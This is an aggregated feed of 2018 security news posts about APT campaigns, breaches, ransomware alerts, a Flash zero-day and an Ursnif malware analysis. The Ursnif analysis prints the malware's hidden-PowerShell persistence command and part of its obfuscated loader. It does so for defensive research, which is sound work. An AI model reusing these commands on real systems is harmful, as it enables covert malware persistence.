The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVerison\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, started every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This last campaign of the Iranian ATP group “MuddyWater“ shows a clear example of how hacking groups can leverage system’s tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog.https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.

Hackers conducting botnet attacks through 20k hacked WordPress sites

By Uzair Amir

A newly published research from Defiant, a WordPress security firm, reveals that there is a botnet hunting for WordPress sites using over 20,000 already compromised WordPress sites. As the new sites are infected, these automatically become part of the bot army and start acting on the directions of the attackers to perform tasks like brute […]

This is a post from HackRead.com Read the original post: Hackers conducting botnet attacks through 20k hacked WordPress sites

415,000 routers infected by cryptomining malware – Prime target MikroTik

By Waqas

According to a new report, around 415,000 routers throughout the world are infected with malware having the potential to steal computer resources and discreetly mine for the cryptocurrency. The campaign is an active one and it primarily targets MikroTik routers. Researchers claim that the cryptojacking attacks started in August and in the first string of […]

This is a post from HackRead.com Read the original post: 415,000 routers infected by cryptomining malware – Prime target MikroTik

Evidence in Marriott’s subsidiary Starwood hack points out to China intel

According to a report published by the Reuters, the massive Marriott data breach was carried out by Chinese state-sponsored hackers.

According to the Reuters, people investigating the Marriot data breach believe that it is the result of a cyberattack carried out by Chinese hackers.

Last week Marriott International announced that hackers compromised guest reservation database at its subsidiary Starwood hotels and stolen personal details of about 500 million guests.

Sources quoted by the media agency revealed that the attack was carried out by the Chinese intelligence to gather information.

“Hackers behind a massive breach at hotel group Marriott International Inc left clues suggesting they were working for a Chinese government intelligence gathering operation, according to sources familiar with the matter.” reads the article published by the Reuters.

“Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company’s private probe into the attack.”

The attribution of the Marriott data breach is based on the analysis of tactics, techniques, and procedures (TTPs) that were previously associated with Chinese APT groups.

In particular, Reuters’ sources admitted that some of the tools were exclusively used by Chinese attackers. The attribution is also difficult because the security breach occurred back in 2014, this means that since then other threat actors may have had access to the Starwood systems.

The relations between China and US are even more complicated, US Government accused in many circumstances Beijing of cyber espionage against Western entities.

Chinese authorities denied any involvement in the alleged cyber espionage operations.

“China firmly opposes all forms of cyber attack and cracks down on them in accordance with law,” Chinese Ministry of Foreign Affairs spokesman Geng Shuang told Reuters.”If offered evidence, the relevant Chinese departments will carry out investigations according to law.”

Starwood Data Breach

Marriott International has bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, hackers accessed to the Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed personal information of nearly 327 million guests, compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, reservation date.

Pierluigi Paganini

(Security Affairs – Marriot Data breach, hacking)

The post Evidence in Marriott’s subsidiary Starwood hack points out to China intel appeared first on Security Affairs.

Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool

Takuya Yoshida from Toyota’s InfoTechnology Center and his colleague Tsuyoshi Toyama are members of a Toyota team that developed the new tool, called PASTA (Portable Automotive Security Testbed).

PASTA is an open-source testing platform specifically designed for car hacking, it was developed to help experts to test cyber security features of modern vehicles.

At the BLACK HAT EUROPE 2018 held in London the duo presented the tool and confirmed that  Toyota plans to share the specifications on Github and will start selling the fully built system in Japan.

The PASTA car hacking tool is contained in an 8 kg portable briefcase, experts highlighted the delay of the automotive industry in developing cyber security for modern cars.

“The researchers integrated the tool with a driving simulator program, as well as with a model car to demonstrate some ways it can be used. PASTA also can be used for R&D purposes with real vehicles: that would allow a carmaker to test how a third party feature would affect the vehicle and its security, or reprogram firmware, for example.” reported DarkReading.

PASTA

Source: Dark Reading

Giving a close look at pasta case, we can find four ECUs inside, as well as a console to run tests of the car system operation or to carry out attacks, for example injecting CAN messages.

“There was a delay in the development of cybersecurity in the automobile industry; [it’s] late,” explained Toyama.

Now automakers including Toyota are preparing for next-generation attacks, he said, but there remains a lack of security engineers that understand auto technology.

The tool allows researchers to test communications among components of the vehicle through CAN protocol as well as analyzed engine control units (ECUs) operate of the vehicles.

Watch out, the PASTA was not designed for hacking scenarios like the one presented by the security duo Charlie Miller and Chris Valasek in 2015 when they remotely hacked a Fiat Chrysler connected car.

PASTA implements a simulation for remote operation of vehicle components and features, including wheels, brakes, windows, and other car functionalities.

“It’s small and portable so users can study, research, and hack with it anywhere.” continues the expert.

PASTA supports connections to ODBII, RS232C ports, and a port for debugging or binary hacking.

“You can modify the programming of ECUs in C” as well, he said.

Among future improvements for PASTA there is the implementation of other connectivity features, including Ethernet, LIN, and CAN FD, Wi-Fi and of course Bluetooth.

You can download slides and the research paper from the following link:

• Download Presentation Slides
• Download White Paper

Pierluigi Paganini

(Security Affairs – car hacking, PASTA)

The post Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool appeared first on Security Affairs.

Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems

Ukraine is accusing Russian intelligence services of carrying out cyberattacks against one of its government organizations.

Ukraine’s security service SBU announced to have blocked a cyber attack launched by Russian intelligence aimed at breaching information and telecommunications systems used by the country’s judiciary.

Attackers launched a spear phishing attack using messages purporting to deliver accounting documents. The weaponized document included a strain of malware that was developed to disrupt the exfiltrate data and disrupt the Judiciary Systems.

Ukrainian government experts were able to determine the command and control (C&C) infrastructure that is using Russian IP addresses.

The attack was detected and neutralized thanks to the efforts of  result of collaboration between the State Service on Intellectual Property (SSIP) and the State Judicial Administration.

“Employees of the Security Service of Ukraine blocked the attempt of Russian special services to conduct a large-scale cyberattack on the information and telecommunication systems of the judiciary of Ukraine. Specialists of the SBU noted that the cyberattack began due to the sending by e-mail of counterfeit accounting documents infected by the virus.” reads the alert published by the SBU.

“After opening files on computers, malicious software for unauthorized interference with judicial information systems and theft of official information were hidden. Employees of the Security Service of Ukraine found that the detected virus program was connected from control-command servers that have, in particular, Russian IP addresses.”

In July, Ukraine ‘s SBU Security Service reportedly stopped VPNFilter attack at chlorine station, the malware infected the network equipment in the facility that supplies water treatment and sewage plants.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose, it is originating from Russia.

Technical analysis of the code revealed many similarities with another nation-state malware, the BlackEnergy malware that was specifically designed to target ISC-SCADA systems and attributed to Russian threat actors. BlackEnergy is considered the key element in the attack aimed at Ukrainian power grid in 2015 and 2016, it was also involved in attacks against mining and railway systems in the country.

This week, Adobe released security updates for Flash Player that address two vulnerabilities, including a zero-day flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

Gigamon has also published a blog post describing the flaw and the attack, the experts pointed out that the decoy document in Russian language was submitted tVirusTotal from a Ukranian IP address. Qihoo 360 researchers observed the attack was launched just days after the Kerch Strait incident that occurred on November 25, when Russian Federal Security Service (FSB) border service coast guard boats fired upon and captured three Ukrainian Navy vessels that had attempted to pass from the Black Sea into the Sea of Azov through the Kerch Strait while on their way to the port of Mariupol.

Some of the injured crew members were taken to hospitals in Moscow and one of these hospitals could be the Polyclinic No. 2. Malicious documents involved in this attack were uploaded to VirusTotal from a Ukrainian IP address, which could indicate that Ukrainian cyberspies targeted the hospital to obtain information on the state of the crew members.

Pierluigi Paganini

(Security Affairs – Ukraine, Russia)

The post Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems appeared first on Security Affairs.

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and make lateral movements to infect other hosts on the network.

According to the report, attackers used the JexBoss Exploit Kit to compromise JBoss applications. Threat actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, they use brute force attacks and stolen login credentials.

After obtaining access to the victim’s network, attackers escalate privileges then they drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the experts, attackers used stolen RDP credentials that were bought from darknet marketplaces. and used in attacks within hours of purchasing the credentials.

The alert also technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

The post DHS and FBI published a joint alert on SamSam Ransomware appeared first on Security Affairs.

CVE-2018-15982 Adobe zero-day exploited in targeted attacks

Adobe released security updates for Flash Player that address two vulnerabilities, including a critical flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Adobe fixed two flaws including a critical use-after-free bug, tracked as CVE-2018-15982, exploited by an advanced persistent threat actor aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code, Adobe addressed it with the release of Flash Player 32.0.0.101 for Windows, macOS, Linux, and Chrome OS.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one critical vulnerability in Adobe Flash Player and one important vulnerability in Adobe Flash Player installer.” reads the security advisory published by Adobe.

“Successful exploitation could lead to Arbitrary Code Execution and privilege escalation in the context of the current user respectively. 

Adobe is aware of reports that an exploit for CVE-2018-15982 exists in the wild.”

Adobe confirmed that it is aware of attacks exploiting the flaw in the wild.

Adobe has credited the following experts for reporting the CVE-2018-15982 flaw:

  • Chenming Xu and Ed Miles of Gigamon ATR
  • Yang Kang (@dnpushmen) and Jinquan (@jq0904) of Qihoo 360 Core Security (@360CoreSec)
  • He Zhiqiu, Qu Yifan, Bai Haowen, Zeng Haitao and Gu Liang of 360 Threat Intelligence of 360 Enterprise Security Group
  • independent researcher b2ahex

Attackers used decoy Word documents including Flash file with zero-day vulnerability. The Word document is included in a RAR archive with a JPG picture. When the Flash vulnerability is triggered, the malware extracts the RAT code embedded in the JPG picture.

“The attack strategy is very clever: Flash file with 0day vulnerability is inserted into decoy Word document which is compressed into one RAR file with a JPG picture. When Flash 0day vulnerability is triggered, it will extract out RAT from that JPG picture. Such trick aims to avoid detection of most security software. This RAT has same digital signature as one RAT which is very likely written by Hacking Team, latter was found August 2018. We believe that the new RAT is an upgrade version of Hacking Team’s RAT.” reads the analysis published by 360 the Enterprise Security Group.

“This vulnerability and exploitation code could be reused by cybercriminals even other APT groups for large-scale attacks, we would suggest users to take necessary protection, like applying latest Adobe Flash patch.”

“The vulnerability (CVE-2018-15982) allows for a maliciously crafted Flash object to execute code on a victim’s computer, which enables an attacker to gain command line access to the system.” reads the post published by Gigamon.

The document was submitted to VirusTotal from a Ukranian IP address and contains a purported employment application for a Russian state healthcare clinic. “

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

The post CVE-2018-15982 Adobe zero-day exploited in targeted attacks appeared first on Security Affairs.

Fractured Block Campaign: CARROTBAT dropper dupports a dozen decoy document formats

Palo Alto Networks recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Experts from Palo Alto Networks have recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Security experts from Palo Alto Networks have discovered a malware dropper, dubbed CARROTBAT, that could support a dozen decoy document file formats to drop many payloads.

Even if CARROTBAT was first discovered in March 2018, in the past three months experts observed an intensification of the activity associated with the dropper.

CARROTBAT was spotted while threat actors were using it to drop payloads in South and North Korea region, attackers were using subjects such as crypto-currencies, crypto-currency exchanges, and political events for the decoy documents.

“Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to deliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series of subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events.” reads the analysis published by Palo Alto Networks.

CARROTBAT was used in an attack against a British government agency in December, at the time threat actors used the decoy documents to drop the SYSCON backdoor.

Palo Alto Networks detected 29 unique CARROTBAT samples since its discovery, they contained a total of 12 unique decoy documents.

Palo Alto Networks tracked the CARROTBAT attacks as Fractured Block, the attackers used 11 decoy document file formats (.doc, .docx, .eml, .hwp, .jpg, .pdf, .png, .ppt, .pptx, .xls, and .xlsx.)

In March attackers were using the dropper to deliver different payloads, including old versions of the SYSCON RAT and new sample of the OceanSalt malware.

Experts pointed out that CARROTBAT is not sophisticated and implements a rudimentary command obfuscation.

Once the embedded decoy document is opened, an obfuscated command is executed on the system to download and execute a remote file via the Microsoft Windows built-in certutil utility.

The analysis of timestamps associated with CARROTBAT samples revealed they have been compiled between March 2018 and September 2018.

Experts observed between March and July attackers using the dropper to deliver multiple instances of SYSCON. Since June, OceanSalt attackers started using it too.

Experts discovered an infrastructure overlap between the CARROTBAT and KONNI malware families.

Cisco Talos team discovered the KONNI malware in May when it was used in targeted attacks aimed at organizations linked to North Korea.

The malware, dubbed by researchers “KONNI,” was undetected for more than 3 years and was used in highly targeted attacks. It was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.

On August, experts at Cylance noticed that the decoy document used in KONNI attacks is similar to the one used in recent campaigns of the DarkHotel APT.

“Finding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity.”  Palo Alto Networks concludes. 

“The various overlaps encountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor. However, we do not believe there to be enough evidence at this time to make this claim with complete certainty.”

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Fractured Block Campaign: CARROTBAT dropper dupports a dozen decoy document formats appeared first on Security Affairs.

Email accounts of top NRCC officials were hacked in 2018

Threat actors had access to the email accounts of at least four NRCC aides and spied on thousands of sent and received emails for several months.

The email system at the National Republican Congressional Committee (NRCC), the Republican Party’s campaigning arm, was hacked.

The news was first reported by Politico, later the committee admitted the intrusion and confirmed that attackers had access to mail messages for months.

Threat actors had access to the email accounts of at least four NRCC aides and spied on thousands of sent and received emails for several months.

“The House GOP campaign arm suffered a major hack during the 2018 midterm campaigns, exposing thousands of sensitive emails to an outside intruder, according to three senior party officials.” states the report published by Politico.

“The email accounts of four senior aides at the National Republican Congressional Committee were surveilled for several months, the party officials said. The intrusion was detected in April by an NRCC vendor, who alerted the committee and its cybersecurity contractor. An internal investigation was initiated, and the FBI was alerted to the attack, said the officials, who requested anonymity to discuss the incident.”

An NRCC vendor alerted the committee and its cybersecurity contractor in April. The National Republican Congressional Committee alerted the authorities and launched an internal investigation.

Politico reported that senior House Republicans, including Speaker Paul Ryan of Wisconsin, Majority Leader Kevin McCarthy of California and Majority Whip Steve Scalise of Louisiana, were not informed of the intrusion until the media outlet reported it to the NRCC earlier this week.

NRCC focus

It is a difficult moment for the Republican Party that lost 40 seats and gave up majority control to the Democrats in the House after the 2018 mid-term election.

At the time, the attack was not attributed to a specific threat actor, anyway, it is clear that hackers have carried out a cyber espionage campaign.

The attack presents many similarities with the DNC hack occurred before the 2016 election, US intelligence attributed it to Russia-linked APT groups.

It’s not clear, what measures adopted the NRCC to prevent such kind of intrusions, after being notified of the intrusion the committee alerted the security firm Crowdstrike.

“Like other major committees, the NRCC also had security procedures in place before the election cycle began to try to limit the amount of information that could be exposed to a potential hacker. It also employed a full-time cybersecurity employee.” concludes Politico.

Pierluigi Paganini

(Security Affairs – National Republican Congressional Committee (NRCC), hacking)

The post Email accounts of top NRCC officials were hacked in 2018 appeared first on Security Affairs.

Healthcare Cybersecurity

The healthcare industry is one of the biggest targets for hackers and other bad actors, given the massive amount of personal data these organizations have in their possession and the

The post Healthcare Cybersecurity appeared first on The Cyber Security Place.

Security Affairs: M2M protocols can be abused to attack IoT and IIoT systems

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

According to a study conducted by experts from Trend Micro and the Polytechnic University of Milan. attackers abuse M2M protocols to target IoT and IIoT devices.

The experts analyzed the M2M protocols, the Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP).

The former one is a messaging protocol used to establish communication between a broker and multiple clients, the latter is a UDP client-server protocol that allows communications between nodes.

M2M protocols flaws

The experts pointed out that attackers could abuse M2M protocols for target reconnaissance, industrial espionage, targeted attacks, and to make lateral movements.

Researchers monitored both protocols over a period of four months, they the attacker’s role for their research

“For data gathering, we played the role of a casual attacker with modest resources, scanning the internet for exposed MQTT brokers and CoAP hosts. In just nearly four months, such a “casual attacker” was able to collect 209,944,707 MQTT messages obtained from 78,549 brokers and 19,208,047 CoAP responses from 441,964 servers.” reads the research paper.

The analysis of the MQTT protocol revealed the existence of security flaws that could be exploited to trigger DoS condition or execute arbitrary code. Trend Micro reported vulnerabilities to the developers of the affected software that have quickly released patches.

Below a video PoC of the attacks abusing the MQTT protocols:

The researchers did not find security flaws in the  CoAP protocol, but warned that it is susceptible to IP spoofing, attackers could exploit it for DDoS amplification attacks.

“However, the Request for Comments (RFC) defining the protocol, RFC 7252,5 explicitly pinpoints the security issues (mainly due to the “connectionless” nature of UDP), which we confirmed with a practical experiment.” continues the report.

“On a test network with CoAP clients and servers, we launched an amplification attack with increasing payload size and estimated the maximum bandwidth amplification factor (BAF). According to our estimate, CoAP can reach up to 32 times (32x) amplification factor, which is roughly between the amplification power of DNS and SSDP.”

Experts highlighted the risks that malware in the next future could abuse M2M protocols for malicious activity.

“MQTT and CoAP are data protocols playing a fundamental role in M2M communication among consumer and industrial applications. The presence of unsecure MQTT and CoAP deployments shows no improved security awareness since 2017, when this problem was first highlighted for MQTT.” concludes the report.

“Despite the security recommendations being well highlighted in the CoAP RFC, CoAP already suffers from a deployment problem similar to that affecting MQTT. Both MQTT and CoAP have some features that, even in the absence of implementation vulnerabilities, can be abused to the attacker’s advantage. When deploying or using MQTT and CoAP services, the following practical points should be considered.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post M2M protocols can be abused to attack IoT and IIoT systems appeared first on Security Affairs.



Security Affairs

M2M protocols can be abused to attack IoT and IIoT systems

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

According to a study conducted by experts from Trend Micro and the Polytechnic University of Milan. attackers abuse M2M protocols to target IoT and IIoT devices.

The experts analyzed the M2M protocols, the Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP).

The former one is a messaging protocol used to establish communication between a broker and multiple clients, the latter is a UDP client-server protocol that allows communications between nodes.

M2M protocols flaws

The experts pointed out that attackers could abuse M2M protocols for target reconnaissance, industrial espionage, targeted attacks, and to make lateral movements.

Researchers monitored both protocols over a period of four months, they the attacker’s role for their research

“For data gathering, we played the role of a casual attacker with modest resources, scanning the internet for exposed MQTT brokers and CoAP hosts. In just nearly four months, such a “casual attacker” was able to collect 209,944,707 MQTT messages obtained from 78,549 brokers and 19,208,047 CoAP responses from 441,964 servers.” reads the research paper.

The analysis of the MQTT protocol revealed the existence of security flaws that could be exploited to trigger DoS condition or execute arbitrary code. Trend Micro reported vulnerabilities to the developers of the affected software that have quickly released patches.

Below a video PoC of the attacks abusing the MQTT protocols:

The researchers did not find security flaws in the  CoAP protocol, but warned that it is susceptible to IP spoofing, attackers could exploit it for DDoS amplification attacks.

“However, the Request for Comments (RFC) defining the protocol, RFC 7252,5 explicitly pinpoints the security issues (mainly due to the “connectionless” nature of UDP), which we confirmed with a practical experiment.” continues the report.

“On a test network with CoAP clients and servers, we launched an amplification attack with increasing payload size and estimated the maximum bandwidth amplification factor (BAF). According to our estimate, CoAP can reach up to 32 times (32x) amplification factor, which is roughly between the amplification power of DNS and SSDP.”

Experts highlighted the risks that malware in the next future could abuse M2M protocols for malicious activity.

“MQTT and CoAP are data protocols playing a fundamental role in M2M communication among consumer and industrial applications. The presence of unsecure MQTT and CoAP deployments shows no improved security awareness since 2017, when this problem was first highlighted for MQTT.” concludes the report.

“Despite the security recommendations being well highlighted in the CoAP RFC, CoAP already suffers from a deployment problem similar to that affecting MQTT. Both MQTT and CoAP have some features that, even in the absence of implementation vulnerabilities, can be abused to the attacker’s advantage. When deploying or using MQTT and CoAP services, the following practical points should be considered.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post M2M protocols can be abused to attack IoT and IIoT systems appeared first on Security Affairs.

Dissecting the latest Ursnif DHL-Themed Campaign

Security experts at Yoroi – Cybaze Z-Lab discovered a new variant of the infamous Ursnif malware targeted Italian users through a malspam campaign.

Introduction

In the last weeks, a new variant of the infamous Ursnif malware was discovered hitting Italian users through a malspam campaign. In fact, Yoroi-Cybaze ZLAB isolated several malicious emails having the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The content of the attachment is a .js file and when it is launched, starts the infection by downloading other components from the Internet.

The Dropper

The initial dropper is an obfuscated javascript. Once run, it generates a lot of noisy internet traffic with the purpose to harden the detection of the real malicious infrastructures; as we can see from the following figures, the script contains a series of random-looking URLs it unsuccessfully tries to connect to, generating a huge volume of noise into the analysis environment.

dissecting-ursnif-dhl-campaign

Figure 1: Hard coded urls where the malware tries to connect to generate noise

dissecting-ursnif-dhl-campaign

Figure 2: Generated internet traffic noise

However, the real malicious action performed by the javascript is to create a batch file in the “%APPDATA%\Roaming\325623802.bat” path. The file is a simple script file containing the following code:

dissecting-ursnif-dhl-campaign

Figure 3: Extracted batch file

The script execution pops up to the screen a harmless “FedEx” brochure in pdf format used to decoy the victim, in the meanwhile it downloads and extract a PE32 executable file from a CAB archive hosted on a compromised Chinese website.

dissecting-ursnif-dhl-campaign

Figure 4: PDF downloaded to the internet and shown to the user

The second stage

The second stage of the infection chain is the “ppc.cab” file downloaded by the dropper to the “%APPDATA%\Roaming” location: it actually is a Microsoft Cabinet archive embedding an executable file named “puk.exe”.
The “puk.exe” file promptly spawns a new copy of its own process to make the debugging harder, then it starts several instances of the Internet Explorer process to hide its network activity inside legitimate processes.

Figure 5: spawned processes by the original “puk.exe”

The network traffic generated by the iexplore.exe processes points to the remote destination 149.129.129.1 (ALICLOUD-IN) and 47.74.131.146 (AL-3), part of the malicious infrastructure of the attacker.

dissecting-ursnif-dhl-campaign
Figure 6: C2 network traffic

The beaconing pattern recognized in the C2 communication is consistent with Gozi/Ursnif/IFSB/Dreambot malware variants. In addition, the particular “/wpapi/” base url adopted by the sample matches several malspam campaign tracked during the current year (rif EW. N070618N030618N010318).

dissecting-ursnif-dhl-campaign
Figure 7: Malware’s beaconing requests

Persistency

The third stage of the malware is designed to ensure its persistence into the infected system in the long run. It sets up a particular registry key containing chunks of binary data: “HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6”

dissecting-ursnif-dhl-campaign

Figure 9: Registry key written by the malware

Among the registry key shown above, there is an entry named “ddraxpps”: this particular name has been also used into the persistency mechanism of other Ursnif samples analyzed back in January.  Also, the malware configures a key named “comuroxy” containing a wmic “process call create” command designed to invoke powershell code from the “ddraxpps” entry: C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6').ddraxpps))".

The “ddraxpps” registry key stores a hex string could be decoded applying a simple hex-to-ascii conversion, its content actually is the following obfuscated powershell code:

Figure 10: body of “ddraxpps” key

The first line of code shows a set of commands allowing the execution of some kind of payload encoded in decimal format. The array of numbers in at line two represents the actual executable payload in decimal notation.

  1. $sagsfg=“qmd”;function ndltwntg{$sxpjuhsps=[System.Convert]::FromBase64String($args[0]);[System.Text.Encoding]::ASCII.GetString($sxpjuhsps);};

The third line, instead, contains a base64 encoded powershell snippet revealing the usage of a known payload injection technique: the “APC injection” or “AtomBombing”, used to infect the “iexplore.exe” process.

dissecting-ursnif-dhl-campaign

Figure 11: Commands of the third row of “ddraxpps” key

All the commands shown in Figure 11 are necessary to perform the operation of APC Injection: in the first variable “$jtwhasq” there is the import of the necessary library “kernel32.dll”, in particular the functions “GetCurrentProcess()” and “VirtualAllocEx()”. The second row provides the importing of of the functions “GetCurrentThreadId()”, “QueueUserAPC()”, “OpenThread()”. The third contains the real injection: while the first two lines contains the preparation of all imports, functions and relative parameters, the third one is the responsible of the execution of the actual APC Injection technique. The first step is to properly create a Virtual Section using the “VirtualAllocEx()” function of the current process, identified thanks to “GetCurrentProcess()”. The malware is then copied to the virtual section and, finally, this section is injected in a local thread within the “iexplore.exe” process thanks to the “QueueUserAPC()” function.

Conclusion

In the end, the whole infection chain could be summarized in four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through the registry key installed and the checking and the download of the Ursnif modules.

dissecting-ursnif-dhl-campaign

Figure 12. Representation of the infection chain

Further details, including IoCs and Yara rules, are reported in the original blog post published by Yoroi.

Dissecting the latest Ursnif DHL-Themed Campaign

Pierluigi Paganini

(Security Affairs – Ursnif, malware)

The post Dissecting the latest Ursnif DHL-Themed Campaign appeared first on Security Affairs.

Quora hacked: Personal data of 100 million users stolen

By Waqas

Quora hacked – Change your password now. Another day, another data breach – This time Quora, a question-and-answer website, has suffered a massive data breach in which personal data of 100 million registered users has been stolen, the company said on Tuesday, December 4th. In a blog post, Quora’s Chief Executive Adam D’Angelo explained that the […]

This is a post from HackRead.com Read the original post: Quora hacked: Personal data of 100 million users stolen

Security Affairs: 4 Industries That Have to Fight the Hardest Against Cyberattacks

